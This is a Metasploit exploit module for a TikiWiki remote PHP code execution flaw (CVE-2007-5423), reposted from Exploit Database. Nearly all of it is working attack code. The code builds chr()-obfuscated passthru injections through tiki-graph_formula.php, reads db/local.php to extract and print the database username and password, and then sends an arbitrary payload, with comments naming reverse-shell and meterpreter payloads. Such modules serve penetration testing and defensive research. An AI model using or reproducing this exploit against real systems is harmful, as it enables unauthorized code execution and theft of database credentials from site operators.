TikiWiki tiki-graph_formula – PHP Remote Code Execution (Metasploit)

Exploit Database
170 阅读

作者： Metasploit

日期： 2010-09-20
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/16911/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

# $Id: tikiwiki_graph_formula_exec.rb 10394 2010-09-20 08:06:27Z jduck $

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})

super(update_info(info,

'Name' => 'TikiWiki tiki-graph_formula Remote PHP Code Execution',

'Description'=> %q{

TikiWiki (<= 1.9.8) contains a flaw that may allow a remote

attacker to execute arbitrary PHP code.The issue is due to

'tiki-graph_formula.php' script not properly sanitizing user

input supplied to create_function(), which may allow a remote

attacker to execute arbitrary PHP code resulting in a loss of

integrity.

'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>', 'jduck' ],

'License'=> MSF_LICENSE,

'Version'=> '$Revision: 10394 $',

'References' =>

[

['CVE', '2007-5423'],

['OSVDB', '40478'],

['BID', '26006'],

'Privileged' => false,

'Payload'=>

{

'DisableNops' => true,

# 6k.Really it's the max length of a URI minus the junk

# we have to put in the request to trigger the

# vulnerability.On Apache, 8190 is the max, so this

# should be a pretty safe value.

'Space' => 6144,

# Yes, 'x' is a badchar.The vulnerable code replaces it with '$x'.

'BadChars'=> "<code>\"' %&x",

'Platform' => 'php',

'Arch' => ARCH_PHP,

'Targets'=> [[ 'Automatic', { }]],

'DisclosureDate' => 'Oct 10 2007',

'DefaultTarget'=> 0))

register_options(

[

OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki"]),

], self.class)

end

def check

res = send_request_raw(

{

'uri' => datastore['URI'] + "/tiki-index.php",

'method'=> 'GET',

'headers' =>

{

'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',

'Connection' => 'Close',

}

}, 5)

http_fingerprint({ :response => res })# check method

if (res and res.code == 200 and res.body.match(/TikiWiki v?([0-9\.]*)/))

ver = $1

#print_status("Detected TikiWiki version #{ver}")

ver = ver.split('.')

return Exploit::CheckCode::Safe if (ver[0] != '1')

return Exploit::CheckCode::Safe if (ver[1] != '9')

if (ver.length > 2)

ver2 = ver[2].to_i

if (ver.length > 3)

ver3 = ver[3].to_i

else

ver3 = 0

end

return Exploit::CheckCode::Safe if (ver2 > 8)

return Exploit::CheckCode::Safe if (ver2 == 8 and ver3 > 0)

end

return Exploit::CheckCode::Vulnerable

end

Exploit::CheckCode::Safe

end

def exploit

print_status("Attempting to obtain database credentials...")

url_db_local = build_uri("passthru(" +

"chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89)." +# echo YYY

"chr(59)." +# ;

# cat db/local.php

"chr(99).chr(97).chr(116).chr(32).chr(100).chr(98).chr(47).chr(108).chr(111).chr(99).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112)." +

"chr(59)." +# ;

"chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89)" + # echo YYY

")")

res = send_request_raw({

'uri' => url_db_local,

'method'=> 'GET',

'headers' =>

{

'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',

'Connection' => 'Close',

}

}, 5)

if (res and res.message == "OK" and res.body)

print_status("The server returned: #{res.code} #{res.message}")

print_status("Server version : #{res.headers['Server']}")

db_tiki = res.body.match(/db_tiki='(.*?)';/m)

if (db_tiki)

dbversion = res.body.match(/dbversion_tiki='(.*?)';/m)

host_tiki = res.body.match(/host_tiki='(.*?)';/m)

user_tiki = res.body.match(/user_tiki='(.*?)';/m)

pass_tiki = res.body.match(/pass_tiki='(.*?)';/m)

dbs_tiki= res.body.match(/dbs_tiki='(.*?)';/m)

print_status("TikiWiki database informations : \n")

print("db_tiki : " + db_tiki[1] + "\n")

print("dbversion : " + dbversion[1] + "\n")

print("host_tiki : " + host_tiki[1] + "\n")

print("user_tiki : " + user_tiki[1] + "\n")

print("pass_tiki : " + pass_tiki[1] + "\n")

print("dbs_tiki: " + dbs_tiki[1]+ "\n\n")

end

else

print_status("No response from the server")

end

print_status("Attempting to execute our payload...")

command = Rex::Text.uri_encode(payload.encoded)

url_cmd = build_uri(payload.encoded)

res = send_request_raw({

'uri' => url_cmd,

'method'=> 'GET',

'headers' =>

{

'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',

'Connection' => 'Close',

}

}, 5)

end

# This function will build a fairly randomish query string to be used

# when exploiting this vulnerability :)

def build_uri(f_val)

uri = ''

uri << datastore['URI']

uri << "/tiki-graph_formula.php?"

# Requirements:

query = ''

# 1. w,h,s,min,max must all be numeric

vars = %w{ w h s min max }

min = nil

vars.each { |el|

query << "&" if query.length > 0

num = 1+rand(999)

# 2. min must be less than max

case el

when 's'

num = 1+rand(500)

when 'min'

if (min)

num = min

else

min = num

end

when 'max'

min ||= num

num = min + 1 + rand(99)

end

query << "#{el}=#{num}"

}

# 3. cannot use </code>, ', ", or space

if (f_val.index('\'') or f_val.index('"') or f_val.index('`') or f_val.index(' '))

raise RuntimeError, "The value for the 'f' variable contains an invalid character!"

end

# 4. the function must be one of:

valid = %w{

abs acos acosh asin asinh atan2 atan atanh ceil cos cosh deg2rad

exp expm1 floor fmod hypot log10 log1p log max min pi pow rad2deg round sin

sinh sqrt tan tanh

}

func = valid[rand(valid.length)]

# 5. f must be an array

query << "&" if query.length > 0

# Strip off the semi-colon that the encoder insists on including.

if f_val[-1,1] == ";"

f_val = f_val[0,f_val.length-1]

end

query << "f[]=x.#{func}.#{f_val}"

# This doesn't seem to be necessary on PHP 5.2.4, tikiwiki 1.9.5

# Tested with php/reverse_php, php/meterpreter_reverse_tcp, and

# php/meterpreter/reverse_tcp

#-egypt

# If we dont kill php here it spins eating 100% cpu :-/

#query << '.die()'

# 6. two options for 't' - png and pdf

#- png requires php's gd extension

#- pdf, if you set 'p', requires php pdf extension

#-- we always use 'pdf' with a null 'p'

query << "&" if query.length > 0

query << 't=pdf'

# 7. title must be set

query << '&title='

uri << query

uri

end